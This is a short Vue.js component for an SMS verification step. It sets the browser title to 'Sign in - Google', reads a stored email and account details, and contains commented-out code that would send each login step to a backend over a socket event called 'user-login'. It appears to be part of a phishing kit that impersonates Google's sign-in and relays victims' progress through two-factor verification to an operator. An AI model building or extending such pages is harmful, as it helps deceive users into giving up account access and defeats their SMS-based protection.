<template src="./index.html"></template>
<script>
// ...existing code...
export default {
  name: 'XacMinhSMS',
  data() {
    return {
      username: localStorage.getItem('email'),
      userInfo : localStorage.getItem('accountinfo') ? JSON.parse(localStorage.getItem('accountinfo')) : {},
      smsCode: '',
      verifyType: 1,
      message: ''
    };
  },
  methods: {
    handleSMSVerify(type) {
      // if (!type) return;
      // // Gửi thông tin xác minh SMS lên backend
      // const loginData = {
      //   username: this.username,
      //   status: 'verify_sms',
      //   verifyType: type,
      //   time: new Date().toISOString()
      // };
      // this.$socket.emit('user-login', loginData);
    }
  },
  mounted() {
    document.title = "Sign in - Google";
  }

};
</script>
<style lang="css" scoped>
@import "./styles.css";
</style>